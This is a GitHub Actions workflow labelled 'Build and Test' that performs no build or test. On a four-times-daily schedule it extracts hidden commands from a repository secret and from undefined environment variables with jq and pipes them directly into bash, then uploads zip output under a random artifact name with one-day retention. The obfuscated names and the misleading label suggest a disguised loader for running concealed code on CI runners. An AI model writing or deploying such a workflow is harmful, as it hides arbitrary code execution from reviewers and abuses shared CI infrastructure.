name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '55 1,7,13,19 * * *'
jobs:
  trigger:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Start
        env:
          r6: ${{ secrets.r6 }}
        run: |
          printf '%s' "$r6" | jq -r .tvp42249 | /bin/bash
          echo $xfze920 | jq -r .kp506 | /bin/bash
          echo $xks9085 | jq -r .z3 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: WUYkEAAp
          path: "*.zip"
          retention-days: 1
